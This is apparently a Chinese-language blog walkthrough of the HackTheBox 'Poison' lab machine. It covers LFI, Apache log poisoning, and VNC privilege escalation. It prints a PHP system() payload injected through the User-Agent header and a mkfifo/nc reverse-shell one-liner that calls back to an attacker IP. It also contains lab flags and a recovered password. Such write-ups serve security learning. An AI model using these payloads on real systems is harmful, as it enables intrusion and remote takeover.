[Meachines] [Medium] poison LFI+日志投毒+VNC权限提升

于 2024-08-16 17:58:04 发布
阅读量294 收藏 3
点赞数 3
分类专栏: HackTheBox 文章标签: 开发语言
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141266037
版权

信息收集

IP AddressOpening Ports
10.10.10.84TCP:22,80

$ nmap -p- 10.10.10.84 --min-rate 1000 -sC -sV

22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
|   256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_  256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

LFI & 日志投毒

http://10.10.10.84/browse.php?file=/etc/passwd

image.png

GET / HTTP/1.1
Host: 10.10.10.84
User-Agent: <?php system($_GET['cmd']); phpinfo(); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

http://10.10.10.84/browse.php?1=ls%20-la&file=/var/log/httpd-access.log

image-1.png

image-2.png

$ curl 'http://10.10.10.84/browse.php?1=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.24%2010032%20%3E%2Ftmp%2Ff&file=/var/log/httpd-access.log'

image-3.png

$ cat pwdbackup.txt

$ data=$(cat data); for i in $(seq 1 13); do data=$(echo $data | tr -d ' ' | base64 -d); done; echo $data

image-4.png

Charix!2#4%6&8(0

image-5.png

$ su charix

image-6.png

$ ssh charix@10.10.10.84

image-7.png

User.txt

eaacdfb2d141b72a589233063604209c

权限提升

image-8.png

$ scp charix@10.10.10.84:/home/charix/secret.zip .

解压密码:Charix!2#4%6&8(0

$ file secret

image-9.png

VNC

% netstat -an -p tcp

image-10.png

5901是VNC端口,用于远程桌面访问。

% ps -auwwx | grep vnc

并且以ROOT权限运行

image-11.png

Xvnc :1:

这是 TightVNC 的 X 服务器进程。Xvnc 是一个 X 服务器,它允许在远程设备上运行图形界面。:1 指定了显示编号1。

-desktop X:

设置虚拟桌面的名称为 X。

-httpd /usr/local/share/tightvnc/classes:

指定 TightVNC 的 HTTP 服务器的目录,用于提供 VNC Java 客户端。

-auth /root/.Xauthority:

指定用于 X 服务器认证的授权文件路径。在这里是 /root/.Xauthority

-geometry 1280x800:

指定虚拟桌面的分辨率为 1280x800。

-depth 24:

指定颜色深度为 24 位。

-rfbwait 120000:

设置在开始连接前等待客户端响应的时间为 120000 毫秒(即 120 秒)。

-rfbauth /root/.vnc/passwd:

指定用于 VNC 连接的认证文件,即 /root/.vnc/passwd,这个文件包含了 VNC 的密码。

-rfbport 5901:

指定 VNC 服务器使用的端口号为 5901。VNC 默认使用 5900 端口,:1 表示加1,故使用 5901 端口。

-localhost:

限制 VNC 服务器只能接受来自本地的连接。这意味着只能从本地系统连接到这个 VNC 实例。

-nolisten tcp :1:

禁止 X 服务器监听 TCP 连接。这增加了安全性,因为不会接受来自远程设备的 TCP 连接。

$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

$ vncviewer 127.0.0.1:5901 -passwd secret

image-12.png

Root.txt

716d04b188419cf2bb99d891272361f5

Мартин.
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据投毒:污染数据源头的隐患
禅与计算机程序设计艺术
08-05 743
数据投毒:污染数据源头的隐患 1.背景介绍 1.1 数据的重要性 在当今大数据时代,数据已经成为企业和组织最宝贵的资产之一。高质量的数据对于数据挖掘、机器学习和人工智能等技术的应用至关重要。数据驱动的决策和创新正在深刻影响着各行各业。
HTB-oscplike-valentine+poison+sunday
m0_53302733的博客
03-31 1834
HTB-oscplike-valentine+poison+sunday Valentine easy难度的Valentine 靶机IP 10.10.10.79 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.79 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache htt
Oracle TNS Poison vulnerability监听远程注册投毒漏洞
allway2的博客
08-21 946
Oracle TNS Poison vulnerability A few days after the last critical patch update Oracle had to post security alert for CVE-2012-1675. The issue also known as “TNS Listener Poison Attack” is affecting ...
Spring Boot Kafka - 如何处理毒丸(Poison Pill)消息
锐意工作室
08-17 1887
文章目录Spring Boot Kafka - 如何处理毒丸(Poison Pill)消息前言模拟毒丸(Poison Pill)消息使用ErrorHandlingDeserializer处理反序列化失败参考文档 Spring Boot Kafka - 如何处理毒丸(Poison Pill)消息 前言 在Spring Boot Kafka - 序列化和反序列化JSON 一文中描述了如何在发送消息和接收消息时作JSON序列化和反序列化。 但是上文只考虑了最乐观的情况,如何接收消息时反序列化失败,会怎么样? 如果
Poison-divides-wine.zip_poison
09-21
标题“Poison-divides-wine.zip_poison”和描述中提到的问题是一个经典的数学问题,通常在计算机编程或算法设计中用作逻辑思维的练习。这个问题的核心是使用两个不同容量的容器来实现特定体积液体的转移,同时在此...
knkutils-master.zip_code_poison_zip
07-14
【标题】"knkutils-master.zip_code_poison_zip" 提供了一个有关代码中毒(Code Poisoning)和ZIP文件处理的场景。在这个特定的压缩包中,我们可能找到了一个名为 "knkutils-master" 的项目,这通常表示一个开源或者...
poi.rar_php poi_poison
09-24
WEBPAGE FOR POISON GROUP
Poison Ivy 2.3.2 win7
06-05
Poison Ivy 2.3.2版本,包含win7编译器。使用方法:生成C array格式的服务端,打开patcher,将生成的代码全部拷入patcher编辑框,点击patch it键(可能因为程序界面问题遮盖住不显示,让光标位于编辑框内然后按tab键...
Poison ivy 2.3.2 for windows 7
12-18
在提供的压缩包文件中,"8946571_PI2.3.2过win7.rar"很可能包含Poison Ivy 2.3.2的安装或执行文件,而"no.txt"可能是某种说明或日志文件。请注意,直接使用或传播这类工具违反法律法规,应当仅限于合法的安全研究...
第六天:java设计模式、GUI编程与面向对象设计原则
JavaUpgrade
08-13 392
设计模式的定义:回顾设计模式的定义,即解决特定设计问题的通用解决方案。常见设计模式:了解并掌握几种常见的设计模式,如单例模式、工厂模式、策略模式、观察者模式等。了解它们的基本结构、应用场景和优缺点。设计模式的应用:通过实际例子或练习,尝试将设计模式应用到Java代码中,以解决实际问题。
第3天:文件处理和异常处理——try-except语句处理异常
weixin_49097920的博客
08-14 408
在上面的示例中,我们尝试打开一个存在的文件,并尝试读取其中的数据以及将其转换为整数。try块是包含可能引发异常的代码块,而except块则用于处理try块中可能出现的异常。当try块中的代码引发异常时,程序将跳到相应的except块,并执行对应的异常处理代码。通过访问异常的上下文信息,我们可以获取关于异常发生的详细信息,例如异常的类型、值和堆栈跟踪。除了捕获特定的异常类型(比如ZeroDivisionError),我们还可以使用except块来捕获多个异常类型,或者使用通用的except块来捕获所有异常。
Python知识点:如何使用PySoy进行网络游戏开发
bigorsmallorlarge的专栏
08-14 689
使用PySoy进行网络游戏开发可以帮助你构建基于3D图形的多人在线游戏。PySoy 是一个用 Python 编写的 3D 游戏引擎,支持物理模拟和网络游戏开发
pygame 赛亚人打怪
做一位与众不同的吗喽
08-14 300
笔者最近学了一点pygame,献丑了。代码附上,大佬勿喷!
java面向对象习题
qq_62859013的博客
08-14 237
请创建一个Car抽象类,要求有brand(品牌)属性,并且要求封装私有化,写出属性的 set、get方法。 抽象类Car构造方法中也可以对brand属性赋值,写出一个抽象方法run。 创建一个跑车类SportsCar继承抽象类Car。实现Car抽象方法输出一条语句“超 级跑车”, 在本类中写出一个自己的方法price,输出一条语句“售价100w”。在测 试类Test类中创建跑车对象car1, 用构造器赋值品牌属性,输出属性,调用run、 price方法。创建跑车car2,用set方法赋值属性,输出属性
汇编语言:jcxz 指令
天道酬勤
08-14 261
在汇编语言中,jcxz 标号指令是一个有条件转移指令,用于检测CX寄存器的值,如果CX寄存器的值为0,则跳转到指令中标号所指定的地址处执行;否则,指令将继续顺序执行。‌
python语言day6 os random datetime .ini文件
weixin_45939821的博客
08-14 711
abspath中添加路径,会直接和绝对路径拼接。
C语言-使用指针数组作为函数参数,实现对10个字符串进行排序
Larry的博客
08-14 181
使用作为函数参数,实现对10个字符串进行排序。
Java基础之隐式类型转换
最新发布
u012135697的博客
08-14 613
在变量赋值及算术运算的过程中,经常会用到数据类型转换,其分为两类:隐式类型转换、显式类型转换
poison reverse
12-01
毒性逆转(poison reverse)是一种路由算法中的技术,用于防止路由环路的产生。在RIP协议中,当一个路由器检测到一个邻居路由器的某个路由失效时,它会将该路由的度量值设置为无限大(即16),并将该路由从原接口发回邻居路由器。这样,邻居路由器就会知道该路由已经失效,从而避免了路由环路的产生。 以下是一个示例,假设有三个路由器A、B、C,它们之间的连接如下图所示: ``` A ----- B ----- C ``` 假设路由器A向路由器C发送数据包,但是由于某些原因,路由器B无法将数据包转发给路由器C,导致数据包被丢失。在这种情况下,路由器B会向路由器A发送一个ICMP重定向消息,告诉路由器A应该将数据包发送给路由器C。但是,如果路由器A和路由器C之间的连接出现了问题,路由器C将无法接收到数据包,导致数据包被丢失。为了避免这种情况的发生,可以使用毒性逆转技术,当路由器B检测到路由器C的连接出现问题时,它会将路由器C的路由度量值设置为无限大,并将该路由从原接口发回路由器A,这样路由器A就知道应该避免将数据包发送给路由器C,从而避免了路由环路的产生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值